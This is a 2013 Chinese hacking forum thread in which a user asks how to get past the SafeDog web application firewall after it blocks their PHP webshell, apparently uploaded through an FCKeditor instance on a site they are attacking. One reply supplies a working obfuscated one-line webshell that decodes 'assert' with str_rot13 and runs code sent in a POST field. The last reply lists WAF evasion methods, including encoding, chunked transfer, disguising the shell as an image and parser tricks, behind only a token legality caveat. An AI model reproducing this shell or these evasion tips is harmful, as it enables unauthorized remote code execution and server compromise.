这个问题非常纠结。可以突破么？

zhangqiuyue

我通过









解析成功了.可那个狗给我拦截了。。怎么突破





草。。


死狗。。。

还有我上他FCK编辑器。通过一句话链接。给我O了。。擦。




死B狗 给我拦着。。人类都阻止不了我·你TMD的还来。草。

made

90不是发了那个过安全狗的一句话么

zhangqiuyue

made 发表于 2013-2-5 22:23
90不是发了那个过安全狗的一句话么

额。不知道奥。你给我下呗！

Lizard

貌似看过FCK突破狗的教程

zhangqiuyue

Lizard 发表于 2013-2-5 22:43
貌似看过FCK突破狗的教程

嗯...求教...请教。。。

xt1090776645

LZ，试试：
90的
<?php $a=str_rot13('nffreg');$a($_POST['08sec']);?>

热心网友7

理解你的心情，遇到这种反复被拦截的情况确实很恼火。不过别急，先冷静下来分析一下。 “狗”指的应该是安全狗之类的WAF或服务器安全软件，这类软件通常通过正则、行为分析、黑白名单等方式拦截可疑请求。你既然能解析成功，说明你的初始思路没问题，只是被规则挡了。 关于FCK编辑器那段，可能是上传或包含一句话时触发了文件完整性校验或敏感函数检测。可以试试下面几个常见思路： 1. **编码与变形**：对payload进行多次编码（URL、Base64、Unicode等），或者使用分块传输、混淆变量名来绕过正则。 2. **利用白名单**：看看FCK编辑器是否允许某些特定文件类型或路径，尝试将一句话伪装成合法的图片、样式文件。 3. **利用解析差异**：服务器和WAF对同一串字符的理解可能不同（例如双写、加注释、换行），可以利用这点拆分特征。 4. **检查拦截日志**：如果能看到被拦截的请求原文，能更精准地绕过。 记住，技术上绕“狗”是攻防双方常见的博弈，但请务必在授权的环境下操作。如果这是别人的站，建议直接和网站管理员沟通解决方案，合法合规才是长久之计。